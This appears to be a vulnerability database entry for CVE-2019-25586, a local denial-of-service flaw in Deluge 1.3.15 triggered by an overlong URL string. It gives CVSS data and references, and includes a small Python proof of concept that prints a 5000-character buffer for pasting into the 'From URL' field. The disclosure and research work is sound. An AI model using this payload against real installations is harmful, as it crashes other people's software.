CVE-2019-25586

Description

Deluge 1.3.15 contains a denial of service vulnerability that allows local attackers to crash the application by supplying an excessively long string in the URL field. Attackers can paste a buffer of 5000 characters into the 'From URL' field during torrent addition to trigger an application crash.

CVSS Details

CVSS Score

6.2

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:deluge-torrent:deluge:1.3.15:*:*:*:*:*:*:* - VULNERABLE

Deluge 1.3.15

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# Proof of Concept for CVE-2019-25586
# This script generates the payload to trigger the Denial of Service in Deluge 1.3.15

def generate_payload(size=5000):
    """
    Generates a buffer of 'A' characters.
    Pasting this string into the 'From URL' field in Deluge causes a crash.
    """
    return "A" * size

if __name__ == "__main__":
    payload = generate_payload()
    print(f"[+] Generated payload with length: {len(payload)}")
    print("[+] Copy the string below and paste it into the 'From URL' field in Deluge:")
    print(payload)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2019-25586
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2019-25586
[3] CVE Details https://www.cvedetails.com/cve/CVE-2019-25586/
[4] VulDB https://vuldb.com/cve/CVE-2019-25586
[5] http://download.deluge-torrent.org/windows/deluge-1.3.15-win32-py2.7.exe
[6] https://dev.deluge-torrent.org/
[7] https://www.exploit-db.com/exploits/46883
[8] https://www.vulncheck.com/advisories/deluge-denial-of-service-via-url-field

Raw JSON Data

JSON

{"cve": {"id": "CVE-2019-25586", "sourceIdentifier": "[email protected]", "published": "2026-03-22T01:16:56.697", "lastModified": "2026-03-24T14:41:36.730", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Deluge 1.3.15 contains a denial of service vulnerability that allows local attackers to crash the application by supplying an excessively long string in the URL field. Attackers can paste a buffer of 5000 characters into the 'From URL' field during torrent addition to trigger an application crash."}, {"lang": "es", "value": "Deluge 1.3.15 contiene una vulnerabilidad de denegación de servicio que permite a atacantes locales bloquear la aplicación al introducir una cadena excesivamente larga en el campo URL. Los atacantes pueden pegar un búfer de 5000 caracteres en el campo 'Desde URL' durante la adición de un torrent para provocar un bloqueo de la aplicación."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-466"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:deluge-torrent:deluge:1.3.15:*:*:*:*:*:*:*", "matchCriteriaId": "EA2EDC5F-A278-4C76-B8F6-DD218152AB7C"}]}]}], "references": [{"url": "http://download.deluge-torrent.org/windows/deluge-1.3.15-win32-py2.7.exe", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://dev.deluge-torrent.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/46883", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/deluge-denial-of-service-via-url-field", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}